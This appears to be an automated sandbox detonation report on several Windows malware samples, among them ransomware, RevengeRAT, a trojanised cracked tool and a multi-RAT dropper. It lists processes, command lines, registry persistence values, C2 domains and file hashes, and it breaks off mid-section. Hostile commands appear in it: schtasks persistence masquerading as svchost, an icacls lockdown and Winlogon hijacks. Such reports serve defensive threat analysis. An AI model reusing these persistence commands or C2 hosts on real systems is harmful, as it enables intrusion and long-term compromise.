PID 5496 wrote to memory of 4724 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 5496 wrote to memory of 4724 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 4780 wrote to memory of 6060 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 4780 wrote to memory of 6060 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 4780 wrote to memory of 6060 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe

Processes

C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe

"C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe"

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\e12d5353-769e-4b8e-a6cd-893dd680b5c5" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe

"C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3568 -ip 3568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 2152

C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe

"C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe" --ForNetRes "FsnDCf1u1wJvLcqbFxxtOchBf2V2lgtk24oM5mt2" 0h7mFQcjRC3pDgsRcrWZ7K7bdAgvgDos224DmXt1 IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe

"C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe" --Service 5496 "FsnDCf1u1wJvLcqbFxxtOchBf2V2lgtk24oM5mt2" 0h7mFQcjRC3pDgsRcrWZ7K7bdAgvgDos224DmXt1

C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe

"C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe" --Service 4780 "FsnDCf1u1wJvLcqbFxxtOchBf2V2lgtk24oM5mt2" 0h7mFQcjRC3pDgsRcrWZ7K7bdAgvgDos224DmXt1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6060 -ip 6060

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6060 -s 1272

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4780 -ip 4780

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4780 -s 1656

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.2ip.ua udp
US 104.21.80.1:443 api.2ip.ua tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp
US 104.21.80.1:443 api.2ip.ua tcp
US 8.8.8.8:53 loot.ug udp
US 8.8.8.8:53 ymad.ug udp
US 8.8.8.8:53 loot.ug udp
US 8.8.8.8:53 loot.ug udp
US 8.8.8.8:53 loot.ug udp
US 104.21.80.1:443 api.2ip.ua tcp
US 104.21.80.1:443 api.2ip.ua tcp
US 104.21.80.1:443 api.2ip.ua tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp

Files

memory/3568-0-0x0000000000400000-0x00000000004A9000-memory.dmp

memory/3568-2-0x00000000004F0000-0x00000000005F0000-memory.dmp

memory/3568-3-0x0000000000400000-0x0000000000476000-memory.dmp

C:\Users\Admin\AppData\Local\e12d5353-769e-4b8e-a6cd-893dd680b5c5\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe

MD5 ead18f3a909685922d7213714ea9a183
SHA1 1270bd7fd62acc00447b30f066bb23f4745869bf
SHA256 5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18
SHA512 6e532d9c3d186e4dac38823ae9152056346e283613f0caf088b21a1b3e5f4f6cf3bad8c407168b1072895a386e3be0b8c11ad1cb326d3d3ff0eb8562052def91

memory/3568-16-0x0000000000400000-0x0000000000476000-memory.dmp

memory/3568-15-0x0000000000400000-0x00000000004A9000-memory.dmp

memory/5496-18-0x0000000000400000-0x00000000004A9000-memory.dmp

memory/5496-19-0x0000000000400000-0x00000000004A9000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

MD5 1fbb37f79b317a9a248e7c4ce4f5bac5
SHA1 0ff4d709ebf17be0c28e66dc8bf74672ca28362a
SHA256 6fb1b8e593cb0388f67ead35313a230f524657317ea86271b3a97362e5ec6ad9
SHA512 287e1d62c9ceb660965c266f677c467fbb997c2f5dcd1d63e185e266488aafc3489ac1d3feec81d10f01ce4a72e61a8bc4e124f137ce8675a220aa7797002e74

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

MD5 e3c54743de3ae30eaf044c2c5be4932b
SHA1 19b5f69413c4034de3ab22ffb0f805db08a6e31b
SHA256 2989e8252d64285fa888b7d4f569afc4c9fce47ab29652170be7d18f5c64dbc9
SHA512 8b471dee61c22790b1622c6f6855db528d3d6e510ed4f4a25eddb1ec79b939930695fc2e24eafe067299d87e822ad2a03dd4eb9db4da45e1640253a91c95add0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 4a90329071ae30b759d279cca342b0a6
SHA1 0ac7c4f3357ce87f37a3a112d6878051c875eda5
SHA256 fb6a7c3edcd7b97fabc18855102a39fc4d6d3f82c0fdd39b1667807b71b9c49b
SHA512 f0e206053d4369437c2c0f1f90f0fd03d631e4b9859d807049b41efde823d64cf4d75c28316d932360f7c03bd409e923c8bc2d4f5959361feacecfcf101ae823

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 bcd20826432b1e189267e8aca53178f4
SHA1 8465066594f18688c4b219ceb530a221184740b2
SHA256 232a4a7d117d269007992163c97be3e4729194b4c10accb913c40e5de1a6377f
SHA512 99b287359bff2d2d5bb9dad42c944cc83a40aec7c34bf57cc077baee5559ad6b0b08134a1167d4bd9a0fafc2f4c7e713035265790e255c45eaab98e74b0907b2

memory/5496-24-0x0000000000400000-0x00000000004A9000-memory.dmp

memory/5496-25-0x0000000000400000-0x00000000004A9000-memory.dmp

memory/5496-26-0x0000000000400000-0x00000000004A9000-memory.dmp

memory/4780-29-0x0000000000400000-0x00000000004A9000-memory.dmp

memory/4724-30-0x0000000000400000-0x00000000004A9000-memory.dmp

memory/4724-31-0x0000000000400000-0x00000000004A9000-memory.dmp

memory/4780-32-0x0000000000400000-0x00000000004A9000-memory.dmp

memory/4724-34-0x0000000000400000-0x00000000004A9000-memory.dmp

memory/5496-33-0x0000000000400000-0x00000000004A9000-memory.dmp

memory/4780-36-0x0000000000400000-0x00000000004A9000-memory.dmp

memory/6060-38-0x0000000000400000-0x00000000004A9000-memory.dmp

memory/6060-40-0x0000000000400000-0x00000000004A9000-memory.dmp

memory/4780-41-0x0000000000400000-0x00000000004A9000-memory.dmp

C:\ProgramData\_readme.txt

MD5 d75064cfaac9c92f52aadf373dc7e463
SHA1 36ea05181d9b037694929ec81f276f13c7d2655c
SHA256 163ec5b903b6baadd32d560c44c1ea4dce241579a7493eb32c632eae9085d508
SHA512 43387299749f31c623c5dd4a53ff4d2eff5edfeb80fd4e2edd45860b5c9367d2767ae2ee9b60824b57301999dd2bd995b7d3bd5e7187e447aed76106272559d1

C:\ProgramData\Microsoft\Network\Downloader\edbtmp.log

MD5 f782b09fd215d3d9bb898d61ea2e7a37
SHA1 a382348e9592bdf93dd10c49773b815a992fa7c7
SHA256 7bd4646090dff9875e08ea00e5727b11be19fcb850344856e66360c152835694
SHA512 9342bd7a0cbabd7e699ea545897a6403371a0034e4bea067a9662dad9e492c5fa9b27efa4c850e1c001c79d6a76ffe0dacb6831010e41c8d5e2a92bd5b898606

C:\ProgramData\Package Cache\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}v48.108.8828\dotnet-host-6.0.27-win-x64.msi

MD5 c3c0fe1bf5f38a6c89cead208307b99c
SHA1 df5d4f184c3124d4749c778084f35a2c00066b0b
SHA256 f4f6d008e54b5a6bac3998fc3fe8e632c347d6b598813e3524d5489b84bd2eaf
SHA512 0f3e96d16c512e37025b04ff7989d60126c3d65fe868dbcfbeae4dac910ce04fc52d1089f0e41ce85c2def0182a927fdcc349094e74cdd21b45a42fde7f01806

C:\ProgramData\Package Cache\{662A0088-6FCD-45DD-9EA7-68674058AED5}v14.30.30704\packages\vcRuntimeMinimum_amd64\vc_runtimeMinimum_x64.msi

MD5 b2e47100abd58190e40c8b6f9f672a36
SHA1 a754a78021b16e63d9e606cacc6de4fcf6872628
SHA256 889217bcb971387bc3cb6d76554646d2b0822eceb102320d40adf2422c829128
SHA512 d30da8c901e063df5901d011b22a01f884234ddddd44b9e81b3c43d93a51e10342074523339d155d69ff03a03a1df66c7d19e0137a16f47735b5b600616ca2a9

Analysis: behavioral14

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:15

Platform

win10v2004-20250502-en

Max time kernel

130s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\948340be97cc69c2cf8e5c8327ee52a89eeb50095f978696c710ad773a46b654.exe"

Signatures

RevengeRAT

trojan revengerat

Revengerat family

revengerat

RevengeRat Executable

stealer
Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\948340be97cc69c2cf8e5c8327ee52a89eeb50095f978696c710ad773a46b654.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Client.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Client = "C:\\Users\\Admin\\AppData\\Roaming\\Client.exe" C:\Users\Admin\AppData\Roaming\Client.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\948340be97cc69c2cf8e5c8327ee52a89eeb50095f978696c710ad773a46b654.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Client.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Client.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\948340be97cc69c2cf8e5c8327ee52a89eeb50095f978696c710ad773a46b654.exe

"C:\Users\Admin\AppData\Local\Temp\948340be97cc69c2cf8e5c8327ee52a89eeb50095f978696c710ad773a46b654.exe"

C:\Users\Admin\AppData\Roaming\Client.exe

"C:\Users\Admin\AppData\Roaming\Client.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Client.exe

C:\Users\Admin\AppData\Roaming\Client.exe

C:\Users\Admin\AppData\Roaming\Client.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 cocohack.dtdns.net udp
US 3.33.243.145:84 cocohack.dtdns.net tcp
US 3.33.243.145:84 cocohack.dtdns.net tcp
US 3.33.243.145:84 cocohack.dtdns.net tcp
US 3.33.243.145:84 cocohack.dtdns.net tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp
US 3.33.243.145:84 cocohack.dtdns.net tcp
US 3.33.243.145:84 cocohack.dtdns.net tcp
US 3.33.243.145:84 cocohack.dtdns.net tcp

Files

memory/1892-0-0x00007FFFAA1B5000-0x00007FFFAA1B6000-memory.dmp

memory/1892-1-0x00007FFFA9F00000-0x00007FFFAA8A1000-memory.dmp

memory/1892-2-0x000000001BB50000-0x000000001C01E000-memory.dmp

memory/1892-3-0x000000001C0D0000-0x000000001C176000-memory.dmp

memory/1892-4-0x000000001C240000-0x000000001C2A2000-memory.dmp

memory/1892-5-0x00007FFFA9F00000-0x00007FFFAA8A1000-memory.dmp

memory/1892-6-0x00007FFFAA1B5000-0x00007FFFAA1B6000-memory.dmp

memory/1892-7-0x00007FFFA9F00000-0x00007FFFAA8A1000-memory.dmp

C:\Users\Admin\AppData\Roaming\Client.exe

MD5 aa0a434f00c138ef445bf89493a6d731
SHA1 2e798c079b179b736247cf20d1346657db9632c7
SHA256 948340be97cc69c2cf8e5c8327ee52a89eeb50095f978696c710ad773a46b654
SHA512 e5b50ccd82c9cd5797dfc278dbd4bef6b4cb4468424962666d2618707a3c69e0154e8fb11846e0f529dd6e903fd9de2a2f4dd3b526821b10f08530371a0c6952

memory/4704-17-0x00007FFFA9F00000-0x00007FFFAA8A1000-memory.dmp

memory/1892-18-0x00007FFFA9F00000-0x00007FFFAA8A1000-memory.dmp

memory/4704-19-0x00007FFFA9F00000-0x00007FFFAA8A1000-memory.dmp

memory/4648-21-0x00007FFFA9F00000-0x00007FFFAA8A1000-memory.dmp

memory/4648-23-0x00007FFFA9F00000-0x00007FFFAA8A1000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:15

Platform

win10v2004-20250502-en

Max time kernel

100s

Max time network

116s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\intofont\wincommon.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\es-ES\unsecapp.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Internet Explorer\es-ES\unsecapp.exe C:\intofont\wincommon.exe N/A
File created C:\Program Files (x86)\Internet Explorer\es-ES\29c1c3cc0f76855c7e7456076a4ffc27e4947119 C:\intofont\wincommon.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\intofont\wincommon.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\es-ES\unsecapp.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\intofont\wincommon.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Internet Explorer\es-ES\unsecapp.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 208 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe C:\Windows\SysWOW64\WScript.exe
PID 208 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe C:\Windows\SysWOW64\WScript.exe
PID 208 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe C:\Windows\SysWOW64\WScript.exe
PID 208 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe C:\Windows\SysWOW64\WScript.exe
PID 208 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe C:\Windows\SysWOW64\WScript.exe
PID 208 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe C:\Windows\SysWOW64\WScript.exe
PID 2060 wrote to memory of 5568 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2060 wrote to memory of 5568 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2060 wrote to memory of 5568 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 5568 wrote to memory of 5108 N/A C:\Windows\SysWOW64\cmd.exe C:\intofont\wincommon.exe
PID 5568 wrote to memory of 5108 N/A C:\Windows\SysWOW64\cmd.exe C:\intofont\wincommon.exe
PID 5108 wrote to memory of 4476 N/A C:\intofont\wincommon.exe C:\Windows\SYSTEM32\schtasks.exe
PID 5108 wrote to memory of 4476 N/A C:\intofont\wincommon.exe C:\Windows\SYSTEM32\schtasks.exe
PID 5108 wrote to memory of 2832 N/A C:\intofont\wincommon.exe C:\Windows\SYSTEM32\schtasks.exe
PID 5108 wrote to memory of 2832 N/A C:\intofont\wincommon.exe C:\Windows\SYSTEM32\schtasks.exe
PID 5108 wrote to memory of 4524 N/A C:\intofont\wincommon.exe C:\Windows\SYSTEM32\schtasks.exe
PID 5108 wrote to memory of 4524 N/A C:\intofont\wincommon.exe C:\Windows\SYSTEM32\schtasks.exe
PID 5108 wrote to memory of 4776 N/A C:\intofont\wincommon.exe C:\Windows\SYSTEM32\schtasks.exe
PID 5108 wrote to memory of 4776 N/A C:\intofont\wincommon.exe C:\Windows\SYSTEM32\schtasks.exe
PID 5108 wrote to memory of 744 N/A C:\intofont\wincommon.exe C:\Program Files (x86)\Internet Explorer\es-ES\unsecapp.exe
PID 5108 wrote to memory of 744 N/A C:\intofont\wincommon.exe C:\Program Files (x86)\Internet Explorer\es-ES\unsecapp.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe

"C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\intofont\1Udi0TDz635jTrMWFNrE4kqnOIuYIi.vbe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\intofont\msg.vbs"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\intofont\xLg6v1j1ZJy5DZ1pz826KfZq2BmfLM.bat" "

C:\intofont\wincommon.exe

"C:\intofont\wincommon.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svchost" /sc ONLOGON /tr "'C:\Documents and Settings\svchost.exe'" /rl HIGHEST /f

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svchost" /sc ONLOGON /tr "'C:\ProgramData\Microsoft OneDrive\svchost.exe'" /rl HIGHEST /f

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svchost" /sc ONLOGON /tr "'C:\Users\Default\SendTo\svchost.exe'" /rl HIGHEST /f

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\es-ES\unsecapp.exe'" /rl HIGHEST /f

C:\Program Files (x86)\Internet Explorer\es-ES\unsecapp.exe

"C:\Program Files (x86)\Internet Explorer\es-ES\unsecapp.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 cb76972.tmweb.ru udp
RU 5.23.51.23:80 cb76972.tmweb.ru tcp
US 8.8.8.8:53 vh346.timeweb.ru udp
RU 5.23.51.23:443 vh346.timeweb.ru tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp

Files

C:\intofont\1Udi0TDz635jTrMWFNrE4kqnOIuYIi.vbe

MD5 35f693ab095c33d4c62230d69ff6b43f
SHA1 19e8b126076b5e5d8e8b97f3757ad99357915bf4
SHA256 1a3b550ae14c360fd9600e52924706a356290939317f3a32b35bfa97b5dbc163
SHA512 1e2599c7b10a1fc5c004d7d68c487028d5d2d6a1102af0150ea0c15663819dac42e3a55a769cc532cf45f9f037cece3fcdc2820f2bfbe8439fd0a3d5a16bb4df

C:\intofont\msg.vbs

MD5 01c71ea2d98437129936261c48403132
SHA1 dc689fb68a3e7e09a334e7a37c0d10d0641af1a6
SHA256 0401f2dd76d5ed6f90c82b72e1e7a122ef127bedbaf717532c4bba26d43a0061
SHA512 a668d4216a50ccc699221dd902d8b0f864e44368dc7474fa5659a739154d4e769b85d49b60a73affb8fba7628e7210b0f8106d5652006d1bbba67083513e65d9

C:\intofont\MOS

MD5 cb456215c3333db0551bd0788bc258c7
SHA1 a0b861f6121344b631992c8252fa8748835e4df6
SHA256 7e7b3a01539b5dd82108fe0dc455a76294708bb782f8f7590b06f0975fdf93c1
SHA512 796ccc0f1fc4a990fe3c50f54a2d009e6ddb8e4e062ac1839a2c2c1e6f120311dad66fa86211137cb38cce27a99614085702d5fe9b6f3effc5dd1db0ad879448

C:\intofont\xLg6v1j1ZJy5DZ1pz826KfZq2BmfLM.bat

MD5 9fe442702fb57ffec2b831c3949a74e0
SHA1 e285d89241ef0aeeeb50f65e09a741baf399cb1f
SHA256 d50176a5de27bc9b4c52ebb4e30ec4cbf1e6a79eda4d83a013b220f489a5bcb9
SHA512 548a8df7f0d9278f84eca35bf40638a4572cb625050f7a0684ee14b2117df8307101d8f9383c3fcab23fcf656c21f69db3f4509a037307ed6658ff4c063b4eab

C:\intofont\wincommon.exe

MD5 9134637118b2a4485fb46d439133749b
SHA1 25b60dba36e432f53f68603797d50b9c6cc127ce
SHA256 5dca1a463f5308018c477503a5179f45c468245dd4a84732ee824bd704521acc
SHA512 a6db12e3349c034051940b15adbb530ba34152ccbe41afc210dad7e64331221b3dbae1563a2f3b79a43d12da54eaeac3f30cfb708ebc75ab6a9dfc30a8f1e601

memory/5108-20-0x00000000009E0000-0x0000000000B0C000-memory.dmp

memory/5108-21-0x000000001B600000-0x000000001B622000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:15

Platform

win10v2004-20250502-en

Max time kernel

102s

Max time network

130s

Command Line

"C:\Users\Admin\AppData\Local\Temp\DiskInternals_Uneraser_v5_keygen.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\DiskInternals_Uneraser_v5_keygen.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\DiskInternals_Uneraser_v5_keygen.exe

"C:\Users\Admin\AppData\Local\Temp\DiskInternals_Uneraser_v5_keygen.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:15

Platform

win10v2004-20250502-en

Max time kernel

150s

Max time network

115s

Command Line

"C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe"

Signatures

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Babylon RAT

trojan babylonrat

Babylonrat family

babylonrat

Darkcomet

trojan rat darkcomet

Darkcomet family

darkcomet

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "\"C:\\Users\\Admin\\AppData\\Roaming\\k4Xq51JTS0f2R98Z\\Vt623we1OUKI.exe\",explorer.exe" C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Users\\Admin\\Documents\\excelsl.exe" C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "\"C:\\Users\\Admin\\AppData\\Roaming\\k4Xq51JTS0f2R98Z\\ZtpSdXGAdAWv.exe\",explorer.exe" C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe N/A

Njrat family

njrat

WarzoneRat, AveMaria

rat infostealer warzonerat

Warzonerat family

warzonerat

njRAT/Bladabindi

trojan njrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Warzone RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Disables RegEdit via registry modification

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A

Disables Task Manager via registry modification

defense_evasion

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A

Modifies Windows Firewall

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\YObJeC5tg36kFOoe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A

Drops startup file

Description Indicator Process Target
